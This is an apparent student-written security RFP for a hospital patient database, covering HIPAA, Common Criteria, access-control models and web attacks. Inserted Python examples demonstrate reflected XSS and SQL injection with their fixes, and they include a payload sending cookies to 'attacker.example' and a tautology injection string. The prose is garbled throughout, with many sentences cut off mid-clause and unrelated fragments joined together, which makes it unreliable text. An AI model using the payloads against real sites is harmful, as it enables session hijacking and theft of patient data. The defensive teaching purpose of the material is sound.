Request For Proposal
Francis Quarshie
29/03/2021
DATABASE SECURITY REQUEST FOR PROPOSAL (RFP) 2
OVERVIEW
Crest Military Hospital (CMH), located in Virginia, is recognized throughout the health
healthcare services to the Military, Federal agencies, corporate agencies and the general public.
Crest Military Hospital has consultants in every medical and clinical field, with its core values
Military Hospital is segregated into an organizational structure, with each structure playing a
significant role in the operation of the healthcare facility. The organizational structures are, namely,
service and the supporting services. The board of directors and the administration consist of the
Chief Executive Officer (CEO), Vice President, Executive Assistant and heads of departments.
The board of directors and the administration superintend the budgeting and financing of the
healthcare facility, the formation of facility policies and procedures, and public relations. The
information services are in charge of all facility admissions, taking patient information,
billing, keeping medical records, information systems and human resources. The information
services are responsible for documenting and processing the information of each patient who
visits the healthcare facility. The therapeutic services offer respiratory therapy, medical
psychology, physical therapy, nursing and dispensary. The therapeutic services provide treatment
for patients who visit Crest Military Hospital. Diagnostic services, consisting of the medical
laboratory and medical imaging, establish the cause of sickness. Support services, consisting of
central supply, housekeeping and maintenance, correspondingly deliver support for the whole
facility.
Data is the lifeline of every organization; therefore it is only prudent to ensure the safety
of data and prevent it from ending up in the wrong hands. The information department of Crest
Military Hospital has custody of client information such as names, dates of birth, social security
medical record numbers, admission dates, discharge dates and signatures. This information is
regarded as sensitive; therefore the loss of any of the above can be devastating to the healthcare
facility, hence the need to ensure the confidentiality, integrity and security of this information.
management system to enhance its efficient healthcare delivery. The database management
system is required for handling information based on the large number of Crest Military Hospital's
patients, doctors and staff. As a result of this, data processing becomes
imperative. Sensitive patient health information stored on the database system must
conform with the Health Insurance Portability and Accountability Act (HIPAA). HIPAA is a
federal law that requires national standards to protect sensitive patient health information from
being disclosed without the patient's consent or knowledge. Information such as prescriptions for
patients, last visit, evaluation and diagnosis of patients should be accessible. The health facility
administration must be able to access statistics about the health facility, such as the number of
patients and the number of staff. Patients can book appointments online and at the same time access their lab
intended to safeguard the database management system. Protecting data against unlawful,
unintentional and unauthorized access is paramount to this database.

Database security concepts
The RFP necessitates a regulation to develop a prerequisite for the database and its security;
there is a need to match international standards. The purpose of this is to guarantee the
reliability and efficiency of the database. The RFP will implement the Common Criteria (CC)
international standard developed by the United States, Canada, France, Germany, the
Netherlands and the United Kingdom. The Common Criteria for Information Technology Security
Evaluation are a framework or set of principles for analyzing the security of computer systems
(US-CERT, 2013). Common Criteria security evaluation is obligatory, and compliance with the
Common Criteria benchmarks guarantees that the certifications are recognized globally. CC will
be used to assess the security of the new relational database management system (RDBMS); this
analysis will establish the strength of the RDBMS in upholding the confidentiality,
integrity and availability of the protected health information regulated by HIPAA. Evaluation
assurance levels (EALs) are the levels of functional and assurance requirements defined under the
Common Criteria. The seven EALs are EAL1 functionally tested, EAL2 structurally tested, EAL3
methodically tested and checked, EAL4 methodically designed, tested and reviewed, EAL5
semi-formally designed and tested, EAL6 semi-formally verified, designed and tested, and EAL7
formally verified, designed and tested. Note that an EAL measures the rigor with which a product
was evaluated against its Security Target, not the strength of the security functions themselves.
The higher EALs are stronger and more used for high-risk and
proactive plan to avoid and mitigate hazards linked with a disruption of operation. It details steps
to be taken before, during and after an event to sustain the financial viability of the institution.
When business is interrupted it can cost money: loss of revenue plus extra expenses, meaning
there is going to be a loss of profit. Planning critical functions and infrastructure with several
Defense Models
Defense models that apply to the database management system are defense-in-depth, a
process in which a series of security mechanisms and controls are thoughtfully layered throughout
a computer network to protect the confidentiality, integrity and availability of the network and
the data within. Some of these defense-in-depth principles are strong passwords, which are
critical, multifactor authentication for any account of value, using a phrase, with multiple sub-networks
developed around business needs. Firewalls also control the network traffic
through allow or deny rules, such as blacklisting or whitelisting IP addresses, MAC addresses and
ports. Intrusion prevention or detection systems (IPS/IDS) detect malicious network traffic by
entities on a need-to-know basis to perform or run certain tasks. The basis of this defense model
is that the fewer people who know the details of a mission or task, the lower the likelihood or risk that
the information will be compromised or fall into the hands of the opposition.
Accountability ensures that actions conducted by a user account cannot be disputed
as to which account executed those actions. Every user activity is monitored. Least privilege
adds a further control within a specific document or system: it provides the user only the minimum
levels of access or permissions needed to perform his or her job functions. These models are not
limited to human access but can be extended to applications, systems or connected devices that
Enclave computing segments the internal network to make one of those sections secure
(Northcutt, 2016). The purpose is to limit internal access to a portion of the network. Internal
firewalls will be placed between departments in the Crest Military Hospital to monitor and
control incoming and outgoing network traffic based on predetermined rules; this adds security
to the data exchanged between departments and helps identify where an attack happens. In
addition, Virtual Private Networks (VPNs) will be used to enforce standing policies and to
administer privacy, anonymity and security to users by allowing only authorized hosts to connect
to other hosts. Since the database
would store a significant amount of personally identifiable information and protected health
execution.
The main database environment has to do with the hardware, network, applications and
electronic media used to update the database. The security of the database would be ensured
through the security mechanisms mentioned above. The data security policy within the IT
department would be changed and updated as needed from time to time. These policies
would be enforced by the software, which then interacts with the end user. The IT department in
the hospital is where the database exists, and the IT technicians are the main ones responsible for
updating and maintaining the database. All employees are required to use two-factor
authentication and create strong passwords that expire every 30 days, and also to go through data
security training and Health Insurance Portability and Accountability Act of 1996 (HIPAA)
training during their first week of employment.
The entire database system should ensure all patient data are confidential at all times.
Information from patients, doctors, nurses, medical staff and pharmacists must be updated often.
The flexibility of the database would allow patients and other users to view, modify and update
the records they are authorized for, through the application rather than by direct access to the
database. All updates will run on a secure network with all data being encrypted. By
integrating access across multiple systems, communication and information flow will be
enhanced. The architecture of the system needs to fit in with the current OS and other systems used
in the Crest Military Hospital. Integrating the system will also save time and money and allow
systems to communicate, identify schedules, inventories, staff functions and resume availability
(Arredondo, 2014). System integration requires scalability and flexibility, so it puts less strain on
the system in order to ensure top performance and a high level of reliability; also, certified cloud
and on-premises integrations, real-time data availability and monitoring, common authentication
across all platforms and a master user access index, which will prevent having several files
All users would undergo training on data theft, data extrusion, data exportation, data
leakage, social engineering and the phishing techniques used by hackers, because data can be stolen by
malicious hackers or even by employees. Also, all removable devices used by employees must be
approved by the IT department. Additionally, social engineering and phishing attacks are data
exfiltration tactics used to manipulate and trick someone into opening a malicious script, which
can then infect the entire hospital network. E-mails that contain malware scripts will be
designed to look as if they had been sent from a high-ranking hospital executive, which can affect a
number of users. To curb this, the database needs to be able to reject any software downloads or
Operating systems (OSs) are prone to several threats, including viruses, malware,
spoofing and denial of service. The three main aspects of OS security are confidentiality or
denial (Heiser, 2008). Hardware components and software referenced in the proposed system
shall be employed throughout the product presentation. These resources shall provide for the
security of all data in the Crest Military Hospital's database systems through encryption and shall
only be accessed by authorized personnel. This concept, trusted computing, refers to
technologies and proposals for resolving computer security problems through hardware
manufacturers and software vendors, while the trusted computing base (TCB) refers to all of a
computer system's hardware, firmware and software components that combine to provide the
system with a secure environment.
through hardware enhancements and associated software modifications (Rouse, 2007). This shall
include the following: memory curtaining, which prevents programs from inappropriately
reading from or writing to each other's memory; secure input/output (I/O), which addresses
threats from spyware such as keyloggers and programs that capture the contents of a display;
sealed storage, which allows computers to securely store encryption keys and other critical data
so that they are released only to the same platform in a known software state; and remote
attestation, which detects unauthorized changes to software by generating a signed statement of
what software is running on a PC that a remote party can verify. In order to be effective, these
measures must be supported by advances and refinements in the software and operating systems
(OSs) that the PCs use.
Concerning operating system security, there are some requirements for vendors. These
protection rings protect data and functionality from faults and malicious behavior through a
series of concentric rings, with the innermost ring, 0, being the kernel. Ring 1 holds the other OS
components, which maintain the programs that work with the computer's I/O ports; ring 2
contains drivers and protocols, while ring 3 consists of user-level programs and applications
(Stewart, et al., 2015, p. 320). We require that the database management software, including its
drivers and protocols, not access the kernel or other OS components directly
without going through the reference monitor. Not meeting this requirement could create an
insecure environment. In order to provide the level of security necessary, a trusted platform
module (TPM) would be incorporated. A trusted platform module is a cryptoprocessor chip used
to provide hardware-based cryptographic keys for hard drive encryption. Not only is this
regarded as more secure, but because the keys are hardware-backed, once the drive is encrypted
the only way to decrypt it is to be connected to the same system with the same TPM (Stewart, et
al., 2015, p. 303-304). Therefore, our vendors are required to use a protected and trusted
computing base, which includes implementing trusted platform modules, with whole-disk
encryption where the user would be required to input a password or USB token to authenticate.
implemented for a database based on concepts of separation and controlled information flow.
These concepts are implemented by separation mechanisms which support both untrusted and
trustworthy components, ensuring a total security solution which is tamperproof. The three cyber
security models being considered are the Biba Integrity Model, the Bell-LaPadula Model and the
Chinese Wall Model. Elaboration on each of these models follows. The Bell-LaPadula Model
focuses on data confidentiality and controlled access to classified information. The fundamental
modes of access are read only, write only, or read and write, and this is a simple security model.
Subjects at one level are not allowed to read information above their clearance level (no read up),
and may not write to a level below their own (no write down, the *-property).
Additionally, this method of management assumes that all data are assigned a classification that
will never change (the tranquility principle). This security model is the chosen system of the Crest
Military Hospital because the database has high classification markings and is built on the concept
of a state machine with a set of allowable states in the computer system. The database being
developed must meet requirements such as the presence of safety features, kernel separation and
middleware services. Based on the presence of safety features, there should not be application
errors which might result in a data breach, and the application should allow for concurrent
usage. The kernel separation isolates data to make sure a partition cannot
access resources in other partitions, and also enforces periods processing to make sure there is time
partitioning in the database system to be developed. The middleware services MILS requirement
states that there must be a well-defined message router to ensure data security.
The Biba Integrity Model is a set of access control rules designed to ensure data integrity
throughout the system. It also ensures that no unauthorized users make modifications to
data or programs. It uses subjects and objects with a "no write up" and "no read down" policy,
which ensures the maintenance of internal and external consistency of data and programs. A
scenario in this case is the hospital's board of directors passing along directions (data) to the
clinical services, practice director and financial department, then to the manager and down to the
nurses, medical assistants, front desk receptionists and care coordinators, since that would
preserve the integrity of the board of directors' orders/data and the hierarchy of levels. The
developer must ensure that the system meets the Biba model objectives.
The Chinese Wall Model, also known as the Brewer and Nash security model, concentrates on
confidentiality and implements dynamically changing access approvals: what a subject has
already accessed determines what it may access next. For this system to be
developed, it must meet and achieve these model objectives at every level: at the lowest level
information should be stored as objects; at the intermediate level, related objects are grouped
into company (business) datasets; and at the highest level, datasets are grouped into
conflict-of-interest classes. In
each of the levels there must be an accessibility set and conflict resolution for the write and read
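The following is an added example, not part of the RFP, showing how the three models just described (Bell-LaPadula, Biba and the Chinese Wall) reduce to concrete access checks. The level names, subjects, datasets and conflict-of-interest classes are constructed for the example; the functions `blp_allows`, `biba_allows` and the `ChineseWall` class are illustrative names, not an existing library.

```python
"""Added example, not from the RFP: access checks for the three models
discussed above (Bell-LaPadula, Biba, Chinese Wall). Labels, subjects and
datasets are constructed for the example."""
from dataclasses import dataclass

# Ordered labels; a higher number is more sensitive (BLP) or more trusted (Biba).
LEVELS = {"PUBLIC": 0, "INTERNAL": 1, "CONFIDENTIAL": 2, "RESTRICTED": 3}


@dataclass(frozen=True)
class Subject:
    name: str
    level: str


@dataclass(frozen=True)
class Obj:
    name: str
    level: str


def blp_allows(subject: Subject, obj: Obj, mode: str) -> bool:
    """Bell-LaPadula (confidentiality).
    read : subject level >= object level (simple security, no read up)
    write: subject level <= object level (*-property, no write down)"""
    s, o = LEVELS[subject.level], LEVELS[obj.level]
    if mode == "read":
        return s >= o
    if mode == "write":
        return s <= o
    raise ValueError(f"unknown mode {mode!r}")


def biba_allows(subject: Subject, obj: Obj, mode: str) -> bool:
    """Biba (integrity): the mirror image of BLP.
    read : subject level <= object level (no read down)
    write: subject level >= object level (no write up)"""
    s, o = LEVELS[subject.level], LEVELS[obj.level]
    if mode == "read":
        return s <= o
    if mode == "write":
        return s >= o
    raise ValueError(f"unknown mode {mode!r}")


class ChineseWall:
    """Brewer-Nash: rights depend on what the subject has already read.
    Objects belong to a company dataset; datasets belong to a
    conflict-of-interest (COI) class."""

    def __init__(self, dataset_to_coi: dict[str, str]):
        self.coi_of = dataset_to_coi
        self.history: dict[str, set[str]] = {}   # subject -> datasets read

    def can_read(self, subject: str, dataset: str) -> bool:
        seen = self.history.get(subject, set())
        coi = self.coi_of[dataset]
        # Allowed if already inside this dataset, or if no other dataset of the
        # same COI class has been touched (the wall goes up on first access).
        return dataset in seen or all(self.coi_of[d] != coi for d in seen)

    def read(self, subject: str, dataset: str) -> bool:
        """Record a read; returns False (and records nothing) when denied."""
        if not self.can_read(subject, dataset):
            return False
        self.history.setdefault(subject, set()).add(dataset)
        return True

    def can_write(self, subject: str, dataset: str) -> bool:
        # Writing is only safe if every dataset the subject has read is this
        # one; otherwise information could flow across the wall via the write.
        seen = self.history.get(subject, set())
        return self.can_read(subject, dataset) and seen <= {dataset}
```

A CONFIDENTIAL nurse may read PUBLIC notices but not RESTRICTED records under BLP, while under Biba the same nurse may read RESTRICTED (high-integrity) data but not PUBLIC (low-integrity) data; the two models pull in opposite directions, which is why the RFP has to pick one per property. In the Chinese Wall, the first insurer dataset a subject reads locks it out of every other insurer dataset for the rest of its history.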
The system being developed must not allow the quality, confidentiality and integrity of
the data to be harmed or even completely destroyed. Protecting data is only getting tougher
as attackers have become more sophisticated with their attacks, some of which are hard to
distinguish from a normal user's request. The security software being installed should have the
function of identifying the host against predetermined characteristics, while the network access
control software should be able to determine if the host has the latest OS patch and employs
antivirus security software with the latest updates. In an increasingly insecure world of data
Access control: there are hundreds of employees working here at the Crest Military
Hospital, and there is a need to put in place technical safeguards that require access control to allow only
authorized users to access electronic protected health data. These controls include unique user
IDs, access card readers, an emergency access procedure, automatic log-off, auditing and reports to
track employee access to restricted business locations and proprietary areas, and encryption and
decryption. This system minimizes risk by limiting the amount of information an employee has
access to, and it is controlled by the system administrator in the IT department. The motive for
these precautions is to reduce the threat of hackers or unauthorized persons
gaining access to administrative, client and patient records to cause harm, which can be
damaging to our patients and the reputation of our hospital. The mandatory access control (MAC)
model is the model chosen by the hospital, as it grants users access based on an information
clearance; this policy assigns access rights based on regulations from a central authority.
Authentication: all workers here at Crest Military Hospital are issued common access
cards (CACs) for identification and access purposes. These CACs are smart cards that verify a
cardholder's identity prior to allowing access to protected resources. These CACs carry
employee information such as their names, social security number, employee ID, digital
certificates, biometric data, digital signature and encryption certificates. To gain access the card
must be inserted into the workstation and the employee must type in the card's PIN. All that is
needed in the database system is for it to be able to support CAC and ActivIdentity devices.
Direct object access: all files in the system are encrypted and cannot be accessed directly. All the
information or data in the database is labelled according to its corresponding security level.
The system is designed with high security to log access each time a direct object reference is
made from an untrusted source, and to check on every such request that the caller is authorized
for that specific object; an unguessable identifier alone is not an access control. Hackers can
easily predict file names and their locations once
they have a sample, so all URLs generated must be masked by a Globally Unique Identifier
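As an added illustration of the direct object reference requirement above (example code, not the RFP's or any vendor's implementation): records are addressed by a random UUID rather than a guessable sequential number, and the hardened lookup still authorizes the caller against the record's owner or role and logs every attempt. The record store, user names and roles are constructed for the example.

```python
"""Added example (not from the RFP): guarding direct object references.

Records get an opaque UUIDv4 reference instead of a sequential ID, but the
reference is only a locator; access is decided by ownership or role and every
attempt is logged for audit. Names and data below are constructed."""
import logging
import uuid
from typing import Optional

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("records")

# Constructed sample store: reference -> record
RECORDS: dict[str, dict] = {}


def store_record(owner: str, content: str) -> str:
    """Store a record and return its opaque, unguessable reference."""
    ref = str(uuid.uuid4())
    RECORDS[ref] = {"owner": owner, "content": content}
    return ref


def fetch_record_insecure(ref: str) -> Optional[dict]:
    """Vulnerable: trusts the reference alone. Anyone who obtains or
    guesses a ref gets the record (an insecure direct object reference)."""
    return RECORDS.get(ref)


def fetch_record(user: str, roles: set[str], ref: str) -> Optional[dict]:
    """Hardened: authorize the caller for this specific object and log the
    outcome; 'clinician' is an assumed role name for the example."""
    record = RECORDS.get(ref)
    if record is None:
        log.warning("user=%s ref=%s result=not_found", user, ref)
        return None
    if record["owner"] == user or "clinician" in roles:
        log.info("user=%s ref=%s result=allowed", user, ref)
        return record
    log.warning("user=%s ref=%s result=denied", user, ref)
    return None
```

The log lines carry the caller, the reference and the decision, which is exactly the audit trail needed to spot a client walking through references it does not own.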
Workflow applications must be well equipped to handle errors correctly and prevent information
leakage. If there is an exposure of sensitive information, it could lead to the network being
attacked. Cyber attackers take advantage of error messages, using them to leak private
information. Web application error handling is often not strong enough to survive a
penetration test. An attacker may be able to exploit this to access unauthorized functionality or,
worse, create, modify or destroy data that a failure has left in an unknown state. Insecure data handling
can lead to the separation of data quality from data integrity, which leads to data loss. The main threat
to the confidentiality of the website's data is insecure indexing. Indexing of the website exposes files
which are not meant to be accessible by the public and also leaks information about the existence of
such files and their content. In this process the leaked information is stored by the index and can be
retrieved by a determined attacker. The attacker does not need to thwart the search engine, and this
Cross-site scripting (XSS) is a client-side code injection attack on trusted websites. The
attacker executes malicious scripts in the victim's web browser by including malicious code
in a web page or web application. For example, a victim using a web application (e.g., e-mail or
an e-commerce site) is logged in, and if malicious code is present while he/she is logged in, that
code sends the session information to the attacker. This lets the attacker take over
the user's session and log in while the victim is still using the application. So basically, the
web page or web application becomes a vehicle to deliver malicious scripts to the user's browser.
To protect against XSS, output must be encoded for the context in which it is placed (HTML
body, attribute, JavaScript or URL). Application code should never output data received as
input directly to the browser without encoding it. Everyone involved in building the web
application must be aware of the risks associated with XSS vulnerabilities. No user input should
be trusted, and input from authenticated internal users should be treated the same way public
input is treated. Where rich HTML from users is intentionally allowed, an allowlist-based HTML
sanitizer must be used instead of encoding, because encoding would break the valid tags. In
addition, to mitigate the consequences of a possible XSS vulnerability, a Content Security Policy
(CSP) must be used, because it lets you declare which script and resource sources are allowed to
load, so an injected inline script is blocked even if encoding is missed somewhere.
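The following is an added example, not code from the RFP: a reflected XSS in a template that interpolates input unencoded, beside the same page rendered with context-appropriate encoding, a JavaScript-context variant, and a nonce-based CSP header. The payload, the page template and the function names are constructed for the example.

```python
"""Added example (not from the RFP): reflected XSS and its mitigations.

render_unsafe() puts user input straight into HTML; render_safe() encodes
for the HTML body and attribute contexts and rejects non-http(s) links;
embed_in_script() handles the JavaScript context; csp_header() builds a
Content-Security-Policy that blocks inline script even if encoding is
missed. The payload and template are constructed for the example."""
import html
import json

# Constructed payload: exfiltrates the cookie to an attacker-controlled host.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def render_unsafe(name: str) -> str:
    """Vulnerable: input lands in the HTML body unencoded."""
    return f"<p>Welcome back, {name}</p>"


def render_safe(name: str, link: str) -> str:
    """Hardened: encode per context. html.escape(quote=True) is right for
    both the body and a quoted attribute; the scheme check stops
    javascript: and data: URLs, which encoding alone would not."""
    body = html.escape(name)
    if not link.startswith(("https://", "/")):
        link = "#"
    attr = html.escape(link, quote=True)
    return f'<p>Welcome back, {body}</p><a href="{attr}">profile</a>'


def embed_in_script(value: str) -> str:
    """JavaScript context: JSON-encode and break '</' so a value cannot
    close the surrounding <script> element early."""
    literal = json.dumps(value).replace("</", "<\\/")
    return "<script>var user = " + literal + ";</script>"


def csp_header(nonce: str) -> str:
    """Only scripts carrying this per-response nonce may run; inline event
    handlers, javascript: URLs and plugins are refused by the browser."""
    return (f"default-src 'self'; script-src 'self' 'nonce-{nonce}'; "
            "object-src 'none'; base-uri 'none'")
```

The nonce must be freshly generated per response (for example with `secrets.token_urlsafe`) and placed on every legitimate `<script>` tag; a static nonce gives no protection.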
There are also SQL injection attacks, which allow an attacker to interfere with the queries that
an application makes to its database. It generally allows an attacker to view data that they are
not normally able to retrieve, and this might include data belonging to other users or any other data
the application is able to access. Also, in many cases, the attacker can delete or modify this data,
causing persistent damage to the application's content or behavior. A successful attack can result
in unauthorized access to sensitive data, such as passwords, credit card details or personal user
information. Many high-profile data breaches have been the result of SQL injection attacks, leading
to reputational damage and regulatory fines. To help prevent these attacks, avoid placing user-provided
input directly into SQL statements and instead pass it as a bound parameter of a prepared
statement; also encrypt private or confidential data being
stored in the database. Data permissions and privileges must be limited, alongside avoiding the
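As an added example (not code from the RFP), the following runs a tautology-based injection against an in-memory SQLite table that stands in for a patient lookup, and shows the parameterized query that defeats it. The table, rows and function names are constructed for the example.

```python
"""Added example (not from the RFP): SQL injection against a constructed
in-memory SQLite patient table, with the parameterized fix."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the hospital's patient table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE patient (mrn TEXT, name TEXT, diagnosis TEXT)")
    conn.executemany("INSERT INTO patient VALUES (?, ?, ?)", [
        ("MRN-001", "Ada Okoro", "asthma"),
        ("MRN-002", "Ben Sato", "fracture"),
        ("MRN-003", "Cara Diaz", "migraine"),
    ])
    return conn


def lookup_unsafe(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable: the user-supplied name is spliced into the statement text,
    so a quote in the input changes the query's structure."""
    sql = f"SELECT mrn, name, diagnosis FROM patient WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    """Hardened: the value travels as a bound parameter. The database treats
    it purely as data, so the same payload matches nothing."""
    sql = "SELECT mrn, name, diagnosis FROM patient WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


# Classic tautology payload: closes the string and appends an always-true clause.
INJECTION = "' OR '1'='1"
```

With `INJECTION` as the name, `lookup_unsafe` returns every patient row while `lookup_safe` returns an empty list; the same pattern applies to any driver that supports placeholders (`%s` for psycopg2, `?` for JDBC and most others).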
Insecure configuration management deals with a configuration that is just plain wrong,
either from the start or after changes have been made that compromise the security of the
application or system. This makes guessing passwords, bypassing login pages and finding well-known
setup vulnerabilities a breeze. A faulty configuration can then end up being used
everywhere in the company. Some ways of preventing insecure configuration are:
limiting access to administrator interfaces; disabling default accounts and
passwords; regularly patching and updating software to help protect public applications and
systems from malware; and, last but not least, using automation to your advantage by
regularly running scans and performing audits to find things like missing patches,
Basically, authentication verifies who a user is, and authorization is the approved list of users
and what they are allowed to have access to. Many people gain access to systems via a password
or token ID. Authentication
and session management involve verifying a user's credentials and managing their active
vulnerabilities that attackers exploit to impersonate legitimate users online. Attackers use either
avenue to masquerade as a user: hijacked session IDs or stolen login credentials. For instance, it
takes just one stolen credential to infiltrate and damage your company's viability (OWASP,
2017). These broken authentication attacks are also highly preventable through these
precautionary measures: control session length by tailoring it to the type
of user and the application being used; rotate and invalidate session IDs so that users are
issued a new session ID after login; and password policies like multi-factor authentication
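The session handling measures listed above, as an added example rather than code from the RFP: a small session store that issues cryptographically random identifiers, rotates the identifier at login (so a pre-login ID planted by an attacker never becomes authenticated), and invalidates sessions on logout, after idle time and after an absolute lifetime. The timeout values and the injected clock are assumptions made for the example.

```python
"""Added example (not from the RFP): session IDs rotated at login and
invalidated on logout and timeout. The clock is injected so expiry can be
exercised without sleeping; the limits are assumed values."""
import secrets
import time
from typing import Callable, Optional

IDLE_LIMIT = 15 * 60        # seconds without activity (assumed)
ABSOLUTE_LIMIT = 8 * 3600   # hard cap measured from login (assumed)


class SessionStore:
    def __init__(self, clock: Callable[[], float] = time.time):
        self._clock = clock
        self._sessions: dict[str, dict] = {}

    @staticmethod
    def _new_id() -> str:
        return secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG

    def create_anonymous(self) -> str:
        """Pre-login session, e.g. for a shopping cart or a login form."""
        sid = self._new_id()
        now = self._clock()
        self._sessions[sid] = {"user": None, "created": now, "last": now}
        return sid

    def login(self, old_sid: str, user: str) -> str:
        """Rotate the identifier on privilege change: the old ID is dropped
        and a fresh one is bound to the authenticated user."""
        self._sessions.pop(old_sid, None)
        sid = self._new_id()
        now = self._clock()
        self._sessions[sid] = {"user": user, "created": now, "last": now}
        return sid

    def user_for(self, sid: str) -> Optional[str]:
        """Return the user bound to sid, or None if unknown or expired.
        Expired sessions are removed so they cannot be revived later."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self._clock()
        if now - s["created"] > ABSOLUTE_LIMIT or now - s["last"] > IDLE_LIMIT:
            del self._sessions[sid]
            return None
        s["last"] = now
        return s["user"]

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)
```

Rotation at login is the part most often missed: if the application keeps the pre-login ID, an attacker who set that ID in the victim's browser (session fixation) is logged in the moment the victim authenticates.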
Conclusion
The proposal demonstrated a new medical healthcare database management system. The
upgrade and installation of new hardware and software would help keep the system up to date
with defense requirements and security measures that can detect intrusion and possible attacks.
By agreement, the operating system and database software are expected to be supplied
through encrypted channels only and will be accessible only by authorized employees and staff.
The test plan and remediation results show that this is a necessity, or else insecure data handling
can lead to loss of data, loss of data integrity and complete loss. For these reasons, a
References
Arredondo, R. (2014, June 20). Making the case for healthcare enterprise integration. Sierra-Cedar. Sierra-cedar.com/2014/04/04/making-the-case-for-healthcare-enterprise-integration
Biba, K. J. (1977). Integrity considerations for secure computer systems (MTR-3153). MITRE Corporation.
Brewer, D. F. C., & Nash, M. J. (1989). The Chinese wall security policy. Gamma Secure Systems Limited; Proceedings of the IEEE Symposium on Security and Privacy.
Digital Guardian. What is data exfiltration? https://digitalguardian.com/blog/what-data-exfiltration
Mead, N. (2013). The Common Criteria. US-CERT. Retrieved March 29, 2021, from https://www.us-cert.gov/bsi/articles/best-practices-engineering/the-common-criteria
OWASP. (2017). Error handling. https://www.owasp.org/index.php/Error_Handling
United States Computer Emergency Readiness Team (US-CERT). (2013). The Common Criteria. https://www.us-cert.gov/bsi/articles/best-practices/requirement-engineering/the-common-criteria